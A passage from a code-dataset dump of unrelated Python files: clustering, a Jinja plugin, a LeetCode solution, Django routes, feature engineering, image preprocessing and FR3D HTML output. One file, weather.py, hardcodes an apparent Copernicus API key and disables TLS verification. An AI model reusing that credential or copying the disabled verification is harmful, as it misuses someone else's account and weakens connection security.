WHICH ARE CLOSEST\n for i in range(len(clusters)):\n for j in range(i+1,len(clusters)):\n cache = dist_cluster(clusters[i], clusters[j], metric)\n if(cache < min_dist):\n min_dist = cache\n clust1_idx = i\n clust2_idx = j\n \n clust1 = clusters.pop(clust1_idx)\n clust2 = clusters.pop(clust2_idx -1)\n \n clust1 = clust1+clust2\n clusters.append(clust1)\n \n \n\n\n\n# In[112]:\n\n\nclust_list.append(len(clusters))\nWSS_list.append(WSS(clusters[0]))\n\n\n# In[113]:\n\n\nprint(len(clust_list))\nprint(len(WSS_list))\n\n\n# In[114]:\n\n\nimport matplotlib.pyplot as plt\nplt.plot(clust_list, WSS_list)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ansuman-eng/clustering","sub_path":"AGGLOMERATIVE/agglomerative.py.py","file_name":"agglomerative.py.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43395170145","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 2015年7月27日\n\n@author: ruixidong\n'''\n\nfrom flask import render_template\nfrom jinja2 import ext,Environment,Template\n\n'''\nplugins:\n{name1:tuple(func,template),name2:tuple(func,template)}\n'''\nplugins={}\n\n\ndef Plugin(name,template=None):\n def func(f):\n plugins[name]=(f,template if template!=None else name,)\n return func\n\ndef __rend_plugin__(name):\n global plugins\n if plugins.has_key(name):\n func,template=plugins[name]\n context=func()\n if context.has_key(\"__template__\"):\n template=context[\"__template__\"]\n else:\n context[\"__template__\"]=template\n return render_template(template,**context)\n else:\n return {}\n \n\n\nfrom jinja2 import nodes\nfrom jinja2.ext import Extension\n\n\nclass FragmentPluginExtension(Extension):\n # a set of names that trigger the extension.\n tags = set(['plugin'])\n\n def __init__(self, environment):\n super(FragmentPluginExtension, self).__init__(environment)\n\n # add the defaults to the environment\n environment.extend(\n fragment_cache_prefix='',\n fragment_cache=None,\n )\n\n def parse(self, parser):\n lineno = parser.stream.next().lineno\n args = [parser.parse_expression()]\n body = parser.parse_statements(['name:endplugin'], drop_needle=True)\n return nodes.CallBlock(self.call_method('_render_plugin', args),\n [], [], body).set_lineno(lineno)\n\n def _render_plugin(self, name, caller):\n rv = __rend_plugin__(name)\n return rv\n","repo_name":"drxbate/M1","sub_path":"WEB-APP/CRM-APP/htmlPlugins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32386116496","text":"import cdsapi\nimport pygrib\n\nfrom .country import countries\nfrom .common import sync_fetch\n\n\n\"\"\"\nhttps://datahelpdesk.worldbank.org/knowledgebase/articles/902061-climate-data-api\n\"\"\"\nWB_ENDPOINT = 'http://climatedataapi.worldbank.org/climateweb/rest/v1'\nWB_API = WB_ENDPOINT + '/country/{type}/{var}/{start}/{end}/{ISO3}'\n\n\ndef run_cdsapi():\n c = cdsapi.Client(\n url='https://cds.climate.copernicus.eu/api/v2',\n key='2496:2790f5a7-b4b7-47d5-9a3f-eeeb7fd47d3b',\n verify=0,\n )\n\n r = c.retrieve(\n 'reanalysis-era5-single-levels',\n {\n 'variable': 'total_precipitation',\n 'product_type': 'reanalysis',\n 'year': '2000',\n 'month': '01',\n 'day': '01',\n 'time': [\n '07:00', '08:00', '09:00',\n '10:00', '11:00', '12:00',\n '13:00', '14:00', '15:00',\n '16:00', '17:00', '18:00',\n '19:00', '20:00', '21:00',\n '22:00', '23:00'\n ],\n 'format': 'grib'\n })\n\n r.download('.cache/download.grib')\n grbs = pygrib.open('.cache/download.grib')\n for grb in grbs:\n print(grb.values)\n\n\ndef request_exception_handler(request, exception):\n print('{} Failed'.format(request.url))\n\n\ndef run_wb():\n urls = [\n WB_API.format(\n type='mavg',\n var='pr',\n start='2008',\n end='2018',\n ISO3=country['iso3'],\n ) for country in countries\n ]\n resps = sync_fetch(\n urls,\n headers={},\n exception_handler=request_exception_handler\n )\n for r in resps:\n print(r['url'], r['json'])\n","repo_name":"toggle-corp/ifrc","sub_path":"ifrc-api/collector/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37281905558","text":"#\n# @lc app=leetcode id=1219 lang=python3\n#\n# [1219] Path with Maximum Gold\n#\n# https://leetcode.com/problems/path-with-maximum-gold/description/\n#\n# algorithms\n# Medium (63.12%)\n# Likes: 250\n# Dislikes: 11\n# Total Accepted: 15.8K\n# Total Submissions: 25.1K\n# Testcase Example: '[[0,6,0],[5,8,7],[0,9,0]]'\n#\n# In a gold mine grid of size m * n, each cell in this mine has an integer\n# representing the amount of gold in that cell, 0 if it is empty.\n# \n# Return the maximum amount of gold you can collect under the conditions:\n# \n# \n# Every time you are located in a cell you will collect all the gold in that\n# cell.\n# From your position you can walk one step to the left, right, up or down.\n# You can't visit the same cell more than once.\n# Never visit a cell with 0 gold.\n# You can start and stop collecting gold from any position in the grid that has\n# some gold.\n# \n# \n# \n# Example 1:\n# \n# \n# Input: grid = [[0,6,0],[5,8,7],[0,9,0]]\n# Output: 24\n# Explanation:\n# [[0,6,0],\n# ⁠[5,8,7],\n# ⁠[0,9,0]]\n# Path to get the maximum gold, 9 -> 8 -> 7.\n# \n# \n# Example 2:\n# \n# \n# Input: grid = [[1,0,7],[2,0,6],[3,4,5],[0,3,0],[9,0,20]]\n# Output: 28\n# Explanation:\n# [[1,0,7],\n# ⁠[2,0,6],\n# ⁠[3,4,5],\n# ⁠[0,3,0],\n# ⁠[9,0,20]]\n# Path to get the maximum gold, 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7.\n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= grid.length, grid[i].length <= 15\n# 0 <= grid[i][j] <= 100\n# There are at most 25 cells containing gold.\n# \n#\n\n# @lc code=start\nclass Solution:\n def getMaximumGold(self, grid: List[List[int]]) -> int:\n # BFS\n # O(4^N)\n\n m, n = map(len, (grid, grid[0]))\n q, goldCellId, ans = [], 0, 0\n oneCellTrace = [[0] * n for _ in range(m)]\n\n for i in range(m):\n for j in range(n):\n if grid[i][j]:\n oneCellTrace[i][j] = 1 << goldCellId\n goldCellId += 1\n q.append((i, j, grid[i][j], oneCellTrace[i][j]))\n\n for i, j, s, trace in q:\n ans = max(ans, s)\n for r, c in (i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1):\n if 0 <= r < m and 0 <= c < n and grid[r][c] \\\n and not (trace & oneCellTrace[r][c]):\n q.append((r, c, grid[r][c] + s, trace | oneCellTrace[r][c]))\n\n return ans\n\n\n # def dfs(i, j, s, seen):\n # if i < 0 or i >= m or j < 0 or j >= n or not grid[i][j] or (i, j) in seen:\n # return s\n\n # seen.add((i, j))\n # s += grid[i][j]\n # mx = 0\n # for x, y in (i, j + 1), (i, j - 1), (i + 1, j), (i - 1, j):\n # mx = max(dfs(x, y, s, seen), mx)\n\n # seen.discard((i, j))\n # return mx\n\n # m, n = map(len, (grid, grid[0]))\n # return max(dfs(i, j, 0, set()) for j in range(n) for i in range(m))\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"1219.path-with-maximum-gold.py","file_name":"1219.path-with-maximum-gold.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"40222479060","text":"\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('index', views.index, name='index'),\n path('findcopies', views.findcopies),\n path('addbook', views.addbook),\n path('viewbook', views.viewbook),\n path('addstudent', views.addstudent),\n path('viewstudent', views.viewstudent),\n path('issuebook', views.issuebook),\n path('deletebook', views.deletebook),\n path('deletestudent', views.deletestudent),\n path('viewissuedbook', views.viewissuedbook),\n #path('sendmail', views.sendmail),\n path('searchbook', views.searchbook),\n path('searchstudent', views.searchstudent),\n path('venue_pdf', views.venue_pdf, name='venue_pdf'),\n path('book_pdf', views.book_pdf, name='book_pdf'),\n path('student_pdf', views.student_pdf, name='student_pdf'),\n path('issuedbook_pdf', views.issuedbook_pdf, name='issuedbook_pdf'),\n path('monthlyissuedbook_pdf', views.monthlyissuedbook_pdf, name='monthlyissuedbook_pdf'),\n path('book/upload', views.BookUploadView, name ='BookUploadView'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","repo_name":"jayri5/basic-library-management-system","sub_path":"library/entry/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6597406610","text":"import os\nimport sys\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import PredefinedSplit\nfrom tqdm import tqdm\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append('../../spica')\nfrom spica.features.base import Feature, generate_features, get_arguments\nfrom feat import SubfileFeature\nfrom utils import timer\nfrom config import *\n\nFeature.dir = '../working'\nFeature.prefix = 'inst'\n\n\ndef target_encoding(df, col, fill=None):\n res = pd.DataFrame(index=df.index)\n for i, (trn_idx, val_idx) in tqdm(enumerate(cv.split(train.SK_ID_CURR)), total=cv.get_n_splits()):\n idx = train.SK_ID_CURR[trn_idx].values\n ref = df.query('SK_ID_CURR in @idx').groupby(col)['TARGET'].mean()\n res[i] = df.query('SK_ID_CURR not in @idx')[col].replace(ref)\n if fill is None:\n res[i] = res[i].replace(df[col].unique(), df.query('SK_ID_CURR in @idx')['TARGET'].mean()).astype(float)\n else:\n res[i] = res[i].replace(df[col].unique(), fill).astype(float)\n return res.mean(axis=1)\n\n\nclass InstBasic(SubfileFeature):\n def create_features(self):\n df = inst.copy()\n df['DPD'] = np.maximum(df.DAYS_ENTRY_PAYMENT - df.DAYS_INSTALMENT, 0)\n df['DBD'] = np.maximum(df.DAYS_INSTALMENT - df.DAYS_ENTRY_PAYMENT, 0)\n aggs = {\n 'SK_ID_CURR': ['first'],\n 'NUM_INSTALMENT_VERSION': ['nunique'],\n 'DPD': ['max', 'sum'],\n 'DBD': ['max', 'sum'],\n 'AMT_INSTALMENT': ['sum'],\n 'AMT_PAYMENT': ['sum'],\n }\n via = df.groupby('SK_ID_PREV').agg(aggs).reset_index(drop=True)\n via.columns = ['_'.join(f) if f[0] != 'SK_ID_CURR' else f[0] for f in via.columns]\n via['DPD_nonzero'] = df.query(\"DPD > 0\").groupby('SK_ID_PREV').size().fillna(0)\n via['DBD_nonzero'] = df.query(\"DBD > 0\").groupby('SK_ID_PREV').size().fillna(0)\n self.df = via.groupby('SK_ID_CURR').agg({'mean', 'max'})\n self.df.columns = [f[0] + '_' + f[1] for f in self.df.columns]\n\n\nclass InstTarget(SubfileFeature):\n def create_features(self):\n df = train[['SK_ID_CURR', 'TARGET']].merge(inst, on='SK_ID_CURR', how='right')\n df['bin'] = pd.qcut(inst.NUM_INSTALMENT_VERSION, 500, duplicates='drop', labels=False, retbins=False)\n df['NUM_INSTALMENT_VERSION_target'] = target_encoding(df, 'bin')\n self.df['NUM_INSTALMENT_VERSION_target'] = df.groupby('SK_ID_CURR').NUM_INSTALMENT_VERSION_target.mean()\n\n\nclass InstAmount(SubfileFeature):\n def create_features(self):\n df = inst.copy()\n df['payment_to_schedule_ratio'] = np.log1p(df.AMT_PAYMENT) - np.log1p(df.AMT_INSTALMENT)\n df = df.groupby('SK_ID_PREV').mean()\n df['AMT_PAYMENT_variation_ratio'] = inst.groupby('SK_ID_PREV').AMT_PAYMENT.std() / inst.groupby(\n 'SK_ID_PREV').AMT_PAYMENT.mean()\n df.reset_index(drop=True, inplace=True)\n self.df = df.groupby('SK_ID_CURR')[[\n 'payment_to_schedule_ratio', 'AMT_PAYMENT_variation_ratio'\n ]].agg({'min', 'mean', 'max'})\n self.df.columns = [f[0] + '_' + f[1] for f in self.df.columns]\n\n\nclass InstDelayedAndPrepayed(SubfileFeature):\n def create_features(self):\n df = prev.copy().set_index('SK_ID_PREV')\n ins = inst.copy()\n ins['days_diff'] = ins.DAYS_INSTALMENT - ins.DAYS_ENTRY_PAYMENT\n g = ins.query('days_diff > 0').groupby('SK_ID_PREV')\n df['delayed_count'] = g.size()\n df['delayed_days_sum'] = g.days_diff.sum()\n df['delayed_days_mean'] = g.days_diff.mean()\n df['first_delayed_inst_num'] = g.NUM_INSTALMENT_NUMBER.first()\n df['delayed_AMT_ANNUITY'] = df.query(\"delayed_count > 0\").AMT_ANNUITY\n df['delayed_AMT_CREDIT'] = df.query(\"delayed_count > 0\").AMT_CREDIT\n \n g = ins.query('days_diff < 0').groupby('SK_ID_PREV')\n df['prepayed_count'] = g.size()\n df['prepayed_days_sum'] = -g.days_diff.sum()\n df['prepayed_days_mean'] = -g.days_diff.mean()\n df['first_prepayed_inst_num'] = g.NUM_INSTALMENT_NUMBER.first()\n df['prepayed_AMT_ANNUITY'] = df.query(\"prepayed_count > 0\").AMT_ANNUITY\n df['prepayed_AMT_CREDIT'] = df.query(\"prepayed_count > 0\").AMT_CREDIT\n \n aggs = {\n 'delayed_count': ['mean', 'max', 'sum', 'count'],\n 'delayed_days_sum': ['mean', 'max', 'sum'],\n 'delayed_days_mean': ['mean', 'max', 'sum'],\n 'first_delayed_inst_num': ['min', 'mean', 'max'],\n 'delayed_AMT_ANNUITY': ['min', 'mean'],\n 'delayed_AMT_CREDIT': ['min', 'mean'],\n 'prepayed_count': ['mean', 'max', 'sum', 'count'],\n 'prepayed_days_sum': ['mean', 'max', 'sum'],\n 'prepayed_days_mean': ['mean', 'max', 'sum'],\n 'first_prepayed_inst_num': ['min', 'mean', 'max'],\n 'prepayed_AMT_ANNUITY': ['mean', 'max'],\n 'prepayed_AMT_CREDIT': ['mean', 'max'],\n }\n all_df = df.groupby('SK_ID_CURR').agg(aggs)\n all_df.columns = ['all_' + f[0] + '_' + f[1] for f in all_df.columns]\n past_df = df.query(\"DAYS_TERMINATION < 0\").groupby('SK_ID_CURR').agg(aggs)\n past_df.columns = ['past_' + f[0] + '_' + f[1] for f in past_df.columns]\n future_df = df.query(\"DAYS_TERMINATION > 0\").groupby('SK_ID_CURR').agg(aggs)\n future_df.columns = ['future_' + f[0] + '_' + f[1] for f in future_df.columns]\n self.df = pd.concat([all_df, past_df, future_df], axis=1)\n\n\nclass InstAmountToApplication(Feature):\n prefix = ''\n \n def create_features(self):\n trn = pd.read_feather(WORKING / 'inst_delayed_and_prepayed_train.ftr')\n tst = pd.read_feather(WORKING / 'inst_delayed_and_prepayed_test.ftr')\n cols = trn.filter(regex='AMT_CREDIT').columns\n for f in cols:\n self.train[f'{f}_to_application'] = train['AMT_CREDIT'] / trn[f]\n self.test[f'{f}_to_application'] = test['AMT_CREDIT'] / tst[f]\n cols = trn.filter(regex='AMT_ANNUITY').columns\n for f in cols:\n self.train[f'{f}_to_application'] = train['AMT_ANNUITY'] / trn[f]\n self.test[f'{f}_to_application'] = test['AMT_ANNUITY'] / tst[f]\n\n\nclass InstPaidByPeriod(SubfileFeature):\n def create_features(self):\n inst_ = inst.copy()\n inst_['days_diff'] = inst_['DAYS_ENTRY_PAYMENT'] - inst_['DAYS_INSTALMENT']\n inst_['paid_late'] = np.maximum(inst_['days_diff'], 0)\n inst_['paid_early'] = np.minimum(inst_['days_diff'], 0).abs()\n dfs = []\n df = inst_.groupby('SK_ID_PREV')[['days_diff', 'paid_late', 'paid_early']].agg(['mean', np.count_nonzero])\n df.columns = [f[0] + '_' + f[1] for f in df.columns]\n dfs.append(df)\n for period in tqdm([3, 5, 10]):\n df = inst_.groupby('SK_ID_PREV').head(period).groupby('SK_ID_PREV')[['paid_late', 'paid_early']].agg([\n 'mean', np.count_nonzero])\n df.columns = df.columns = [f'first_{period}_{f[0]}_{f[1]}' for f in df.columns]\n dfs.append(df)\n \n df = inst_.groupby('SK_ID_PREV').tail(period).groupby('SK_ID_PREV')[['paid_late', 'paid_early']].agg([\n 'mean', np.count_nonzero])\n df.columns = df.columns = [f'last_{period}_{f[0]}_{f[1]}' for f in df.columns]\n dfs.append(df)\n \n df = pd.concat(dfs, axis=1) # type: pd.DataFrame\n df = df.merge(inst_[['SK_ID_PREV', 'SK_ID_CURR']].drop_duplicates(), left_index=True, right_on='SK_ID_PREV',\n how='left')\n self.df = df.groupby('SK_ID_CURR').mean()\n\n\nif __name__ == '__main__':\n args = get_arguments('main')\n with timer('load dataset'):\n train = pd.read_feather(TRAIN)\n test = pd.read_feather(TEST)\n prev = pd.read_feather(PREV)\n inst = pd.read_feather(INST)\n cv_id = pd.read_feather(INPUT / 'cv_id.ftr')\n cv = PredefinedSplit(cv_id)\n \n # with timer('preprocessing'):\n \n with timer('create dataset'):\n generate_features(globals(), args.force)\n","repo_name":"amaotone/home-credit-default-risk","sub_path":"feat/inst.py","file_name":"inst.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"5670179659","text":"from getColumns import columns\nfrom copy import copy\n\ndef diagonals_TRigth_BLeft(grid):\n\n new_grid = copy(grid)\n for i in range(0, len(new_grid)):\n new_grid[i] = new_grid[i] + [\"n\"] * (len(new_grid) - 1 - i)\n if i != 0:\n for j in range(0, i):\n new_grid[i].insert(0, \"n\")\n dTRigth_BLeft = columns(new_grid)\n return dTRigth_BLeft\n\ndef diagonals_TLeft_BRight(grid):\n new_grid = copy(grid)\n for i in range(0, len(new_grid)):\n new_grid[i] = new_grid[i] + [\"n\"] * i\n for j in range(0, len(new_grid) - 1 - i):\n new_grid[i].insert(0, \"n\")\n dTLeft_BRight = columns(new_grid)\n return dTLeft_BRight\n\ndef diagonals_length_four_or_over(diagonals):\n for x in range(len(diagonals)):\n diag_str = \"\".join(diagonals[x])\n diag_str = diag_str.replace(\"n\", \"\")\n diag_list = list(diag_str)\n diagonals.append(diag_list)\n return diagonals[len(diagonals) / 2:]\n\n\ndef diagonals(grid):\n diag = diagonals_length_four_or_over(diagonals_TLeft_BRight(grid))[3:-3] + diagonals_length_four_or_over(diagonals_TRigth_BLeft(grid))[3:-3]\n return diag","repo_name":"DamirTesnjak/Python-vaje-Python-exercises","sub_path":"Štiri v vrsto/getDiagonals.py","file_name":"getDiagonals.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23429995349","text":"from BREM.common.module import I3D_BackBone\nimport torch\nimport numpy as np\n\n\ndef test_inference(repeats=3, clip_frames=256):\n model = I3D_BackBone(in_channels=3)\n model.eval()\n model.cuda()\n import time\n\n '''\n 1. 输入视频时间为 25.6s, 视频为30fps, 视频帧数为768\n 2. 10fps 抽帧, 输入模型的帧数为 256\n '''\n video_time = 25.6\n fps = 30\n input_fps = 10\n num_frame = video_time * fps\n clip_frames = int(input_fps * video_time)\n \n run_times = []\n x = torch.randn([1, 3, clip_frames, 96, 96]).cuda()\n warmup_times = 2\n for i in range(repeats + warmup_times):\n torch.cuda.synchronize()\n start = time.time()\n with torch.no_grad():\n y = model(x)\n torch.cuda.synchronize()\n run_times.append(time.time() - start)\n\n infer_time = np.mean(run_times[warmup_times:])\n infer_fps = num_frame * (1.0 / infer_time)\n print(\"inference time (ms):\", infer_time * 1000)\n print(\"infer_fps:\", int(infer_fps))\n # print(y['loc'].size(), y['conf'].size(), y['priors'].size())\n\n\nif __name__ == \"__main__\":\n\n # python BREM/common/I3D_speed.py configs/thumos14.yaml\n test_inference(120, 256)\n","repo_name":"Junshan233/BREM","sub_path":"BREM/common/I3D_speed.py","file_name":"I3D_speed.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71523680164","text":"\n\nfrom io import BytesIO\nimport cv2\nfrom fastapi import APIRouter\nimport numpy as np\nfrom PIL import Image\nfrom skimage.filters import threshold_otsu, threshold_niblack, threshold_sauvola\nfrom skimage import img_as_ubyte\n\n\n\ndef apply_contrast_stretching(image, min_in, max_in, min_out, max_out):\n # Convert PIL Image to numpy array\n image_array = np.array(image)\n\n # Normalize pixel intensities within the desired input range\n normalized_image = np.clip(image_array, min_in, max_in)\n normalized_image = (normalized_image - min_in) * (max_out - min_out) / (max_in - min_in) + min_out\n\n # Convert processed image back to PIL Image\n stretched_image = Image.fromarray(normalized_image.astype(np.uint8))\n stretched_image.save(\"stretched_image.jpg\")\n return np.array(stretched_image)\n\ndef normalize_image(img):\n # Skew correction\n coords = np.column_stack(np.where(img > 0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h, w) = img.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n img = cv2.warpAffine(img, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n \n # convert to png file format of the image in binary form \n png = Image.fromarray(img)\n png.save(\"normalize\"+''+\".png\")\n # return the png file format of the image in binary form\n return np.array(png)\n\ndef preprocess_image(img,greyMethod='average',noiseMethod='gaussian'):\n # Convert to grayscale\n if(greyMethod =='average') :img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n elif (greyMethod == 'luminosity'):img = cv2.cvtColor(img, cv2.COLOR_BGR2LUV)[:, :, 0]\n elif (greyMethod == 'desaturation'):img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)[:, :, 2]\n img = cv2.bitwise_not(img)\n img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n # Noise removal\n if noiseMethod == 'gaussian':\n img = cv2.GaussianBlur(img, (5, 5), 0)\n elif noiseMethod == 'median':\n img = cv2.medianBlur(img, 5)\n elif noiseMethod == 'bilateral':\n img = cv2.bilateralFilter(img, 9, 75, 75)\n\n # convert to png file format of the image in binary form \n png = Image.fromarray(img)\n png.save(\"preprocess-\"+greyMethod+'-'+noiseMethod+\".png\")\n # return the png file format of the image in binary form\n return np.array(png)\n\ndef binarize_image(img,k,window_size, method:str='otsu',name:str = 'binary'):\n \"\"\"\n Binarize an image using OpenCV.\n Args:\n img: The image to binarize.\n method: The binarization method to use. Can be 'otsu', 'niblack', or 'sauvola'.\n k: The k value for niblack binarization.\n window_size: The window size for niblack and sauvola binarization.\n \n Returns:\n The binarized image.\n \"\"\"\n\n # Binarization\n if method == 'otsu':\n thresh = threshold_otsu(img)\n elif method == 'niblack':\n thresh = threshold_niblack(img, window_size=window_size, k=k)\n elif method == 'sauvola':\n thresh = threshold_sauvola(img, window_size=window_size)\n else:\n return None\n binary = img_as_ubyte(img > thresh)\n print('image binarized with '+method+' method successfully'+str(binary.shape))\n # convert to png file format of the image in binary form \n png = Image.fromarray(binary)\n # png.save(name+\".png\")\n \n # return the png file format of the image in binary form\n return np.array(png) \n\n\nasync def read_image(file) -> np.ndarray:\n \"\"\"\n Reads an image from an UploadFile object and returns it as a numpy array.\n \"\"\"\n contents = await file.read()\n img = cv2.imdecode(np.frombuffer(contents, np.uint8), cv2.IMREAD_COLOR)\n return img\n\n\nasync def save_image(image: np.ndarray,name:str='output') :# UploadFile:\n \"\"\"\n Saves an image as an UploadFile object and returns it.\n \"\"\"\n pil_img = Image.fromarray(image)\n with BytesIO() as output:\n pil_img.save(output, format=\"PNG\")\n # save_path = os.path.join(\"http://localhost:3000/\", name + \".png\")\n # pil_img.save(name+'.png',format=\"PNG\")\n contents = output.getvalue()\n # return StreamingResponse(output, media_type=\"image/png\")\n return contents\n ","repo_name":"MoussaRiad/Hispoter-API","sub_path":"services/imageService.py","file_name":"imageService.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25795952751","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('search/', views.search, name=\"index\"),\n path('category/', views.category, name=\"category\"),\n path('watch/', views.watch, name=\"watch\"),\n path('genre/', views.genre, name=\"genre\"),\n path('recent/', views.recent, name=\"recent\")\n]","repo_name":"aldotoci/django_api","sub_path":"test_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1376479668","text":"# write the list of candidate ids and all against all discrepancies to an .html file\n\nimport numpy as np\nimport os\nfrom collections import defaultdict\nfrom fr3d_configuration import SERVER\nfrom fr3d_configuration import OUTPUTPATH\nfrom fr3d_configuration import TEMPLATEPATH\nfrom fr3d_configuration import JS1\nfrom fr3d_configuration import JS2\nfrom fr3d_configuration import JS3\nfrom fr3d_configuration import JS4\nfrom fr3d_configuration import JS5\nfrom fr3d_configuration import REFRESHTIME\n\ndef getCSVfilename(Q):\n if SERVER:\n csvfilename = Q['queryID'] + \"/\" + Q['queryID'] + \".csv\"\n csvlink = Q['queryID'] + \".csv\"\n else:\n csvfilename = \"%s.csv\" % Q['name'].encode('ascii', 'ignore')\n csvfilename = \"%s.csv\" % Q['name']\n csvfilename = csvfilename.replace(\" \",\"_\")\n csvlink = csvfilename\n\n return(csvfilename, csvlink)\n\ndef format_resolution(data):\n\n r = data['resolution']\n try:\n s = \"%0.2f\" % r\n # remove trailing 0\n if s[-1] == \"0\":\n s = s[0:(len(s)-1)]\n except:\n if 'NMR' in data['method']:\n s = \"NMR\"\n else:\n s = \"NA\"\n return s\n\ndef writeHTMLOutput(Q,candidates,allvsallmatrix=np.empty( shape=(0, 0) )):\n \"\"\" Write the list of candidates in an HTML format that also shows\n the coordinate window and a heat map of all-against-all distances.\n \"\"\"\n\n pairTypes = ['glycosidicBondOrientation','chiDegree','pairsStacks','coplanar','BPh','BR','sO','crossingNumber']\n pairsToPrint = defaultdict(list)\n\n # record which of the many possible pairwise interaction columns contain data\n for pairType in pairTypes:\n for candidate in candidates:\n interactions = candidate[\"interactions\"]\n for a in range(0,len(candidate['indices'])): # first position\n for b in range(0,len(candidate['indices'])): # second position\n if (a,b,pairType) in interactions:\n if not pairType == 'crossingNumber':\n pairsToPrint[pairType].append((a,b))\n elif len(interactions[(a,b,pairType)]) > 0 \\\n and interactions[(a,b,pairType)][0] != '0' \\\n and interactions[(a,b,pairType)][0] != 'None':\n pairsToPrint[pairType].append((a,b))\n\n pagetitle = \"FR3D %s\" % Q['name'].encode('ascii','ignore')\n\n if SERVER:\n htmlfilename = Q['queryID'] + \"/\" + Q['queryID']\n else:\n htmlfilename = Q['name'].replace(\" \",\"_\").encode('ascii', 'ignore')\n htmlfilename = Q['name'].replace(\" \",\"_\")\n\n candidatelist = '\\n'\n\n numPositions = Q[\"numpositions\"]\n\n # write header line, with instructions about how to sort each column\n candidatelist += \"\"\n header_column = 2\n if Q[\"type\"] == \"geometric\" or Q[\"type\"] == \"mixed\":\n candidatelist += \"\"\n header_column = 3\n candidatelist += \"\" % header_column # or try Å\n header_column += 1\n for j in range(0,numPositions):\n candidatelist += \"\" % (header_column,j+1)\n header_column += 1\n candidatelist += \"\" % header_column\n header_column += 1\n sequence_column = header_column\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if c[0] == c[1] and pairType == 'glycosidicBondOrientation':\n candidatelist += \"\" % (header_column,c[0]+1)\n header_column += 1\n elif c[0] == c[1] and pairType == 'chiDegree':\n candidatelist += \"\" % (header_column,c[0]+1)\n header_column += 1\n elif pairType == 'crossingNumber':\n candidatelist += \"\" % (header_column,c[0]+1,c[1]+1)\n header_column += 1\n else:\n candidatelist += \"\\n\"\n\n # write one row for each candidate\n for i in range(0,len(candidates)):\n candidate = candidates[i]\n candidatelist += '\"\n\n PDB_id = candidate[\"unitids\"][0][0:4]\n if PDB_id in Q[\"PDB_data_file\"]:\n candidatelist += \"\" % format_resolution(Q[\"PDB_data_file\"][PDB_id])\n else:\n candidatelist += \"\"\n\n # write unit ids\n for j in range(0,numPositions):\n candidatelist += \"\"\n\n # write nucleotide sequence with helpful separator symbols\n sequence = \"\"\n for j in range(0,numPositions):\n fields = candidate[\"unitids\"][j].split(\"|\")\n sequence += fields[3]\n\n if len(fields) == 9: # symmetry operator present\n symm = fields[8]\n else:\n symm = \"\"\n\n if j+1 < numPositions:\n # if same chain and same symmetry operator, if present\n cfields = candidate[\"unitids\"][j+1].split(\"|\")\n if len(cfields) == 9: # symmetry operator present\n csymm = cfields[8]\n else:\n csymm = \"\"\n\n if fields[2] == cfields[2] and symm == csymm:\n if candidate['chainindices'][j] + 1 == candidate['chainindices'][j+1]: # successive\n sequence += \"-\"\n elif candidate['chainindices'][j] + 1 < candidate['chainindices'][j+1]: # later\n sequence += \"→\"\n else:\n sequence += \"←\"\n else:\n sequence += \".\"\n candidatelist += \"\"\n\n # write interactions by group\n interactions = candidate[\"interactions\"]\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if (c[0],c[1],pairType) in interactions and len(interactions[(c[0],c[1],pairType)]) > 0 and interactions[(c[0],c[1],pairType)][0] != \"None\":\n # multiple interactions of the same type separated by 